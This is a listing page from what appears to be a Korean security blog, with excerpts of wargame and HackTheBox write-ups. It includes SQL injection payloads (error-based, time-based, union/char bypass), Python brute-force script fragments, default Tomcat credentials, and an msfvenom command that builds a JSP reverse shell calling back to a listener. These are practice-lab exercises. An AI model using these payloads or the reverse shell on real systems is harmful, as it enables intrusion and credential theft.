워게임200 frankenstein(error based sqli) 괄호가 필터링되어버린다. 그렇다면 함수를 못 쓰는건가 정규식이 생각나서 ?pw=' or id='admin' and pw like "___" 해보려해도 _가 필터링되어 불가능이다. Error based SQL injection 1. Syntax error 2. logical error syntax error : 쿼리 자체는 실행되지 않은 채로, 바로 에러 메시지를 반환한다. logical error : 쿼리 자체는 실행되지만 논리적 오류로 인해 메시지를 반환한다. 때문에 error based sql에서는 logical error을 이용해야 한다. 에러 발생시키는 방법 1. select ~0+1 ~0에는 unsigned의 최댓값이 들어간다. 최댓값에 +1을 해서 에러를 출력하는 방법이다. 2. 9eN N이 .. 2021. 10. 9. blue_dragon(time based sql injection) 싱글 쿼터를 쓰면 no hack이 출력되면서 쿼리에 대한 리턴값을 보여주지 않는다. 쿼리에 대한 리턴값을 보지 않고도 값을 탈취할 수 있는 방법이 있다. Time based SQL injection ?id=admin' and if(length(pw)>0, sleep(2), 0)%23 을 요청한다. 비밀번호의 길이는 8 import requests import time cookies={"PHPSESSID":""} length = 8 passwd="" for i in range(1, length+1): for c in range(33, 123): start = time.time() url = f"https://los.rubiya.kr/chall/blue_dragon_23f2e3c81dca66e496c7de2.. 2021. 10. 9. jerry 롸업 정리(톰캣 배포 이해) nmap 삽질 searchsploit -> not vulnerable.. admin/admin nikto scan 엄청 느리다 => 여기서 /manage/html이 tomcat/s3cret로 뚫린다는 취약점이 나온다. tomcat/s3cret msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=1234 -f war > shell.war nc -nlvp 1234 열어놓고 해당 war 업로드 후 http://10.10.10.95:8080/shell 접속 바로 system 권한의 쉘이 따진다. tomcat 웹 애플리케이션 배포 배포할 프로젝트를 war로 추출한다. war는 web application archive의 약자로 웹 애플리케이션을 배포하기 .. 2021. 10. 9. red_dragon(개행, 이분탐색) id는 길이가 7보다 크면 안되고 no는 숫자여야 한다. select id from prob_red_dragon where id=''||no># and no= 100 쿼리가 이렇게 되면 no값에 따라 T/F를 판단할 수 있다. ?id='||no>%23 no에는 값을 계속 변화시키면서 이분탐색을 하면 된다. 난 우선 그냥 값을 막 집어넣어서 시작지점과 끝지점을 내 임의로 정하고 코드를 짰다. import requests cookies = {"PHPSESSID":""} start=999999 end=9999999999 while start 586482014 2021. 10. 6. silo 롸업 정리(tns listener) nmap microsoft iis 8.5 버전은 취약하지 않다. RPC가 엄청 많이 보인다. TNS.. telnet으로 접속해봤는데 뭐만 입력하면 꺼져버린다. 139, 445포트는 smb.. smbmap, smbclient not working.... enumeration 80 : IIS server. gobuster를 돌려도 유의미한 결과를 얻을 수 없다. smb 관련해서는 smbclient로 접속 불가... tns listener... 이걸 한 번 이용해 익스해봐야겠다. tns listener 검색해보면 oracle,,,, oracle로 enumerate할 수 있는 도구를 찾는게 우선 ODAT sudo apt install odat odat sidguesser -s 10.10.10.82 -p 1521.. 2021. 10. 6. [**] green_dragon $query가 실행된 결과가 $result에 담기는데, $result의 id, pw가 $query2에 담긴다. sqli가 두 번 일어나게 만들어야 하는 것인가... id, pw - prob _ . ' " 필터링 ?id=\&pw=union select \,union select char(97,100,109,105,110)# ?id=\&pw=union select 0x5c,0x756e696f6e2073656c6563742030783631363436643639366523%23 설명하기 어렵다.. 생각해보면 된다. https://man-25-1.tistory.com/106 [웹해킹] LOS 25 - (Green Dragon) Lord of sql injection - green dragon 풀이 이제 풀다보니 .. 2021. 10. 6. 이전 1 ··· 15 16 17 18 19 20 21 ··· 34 다음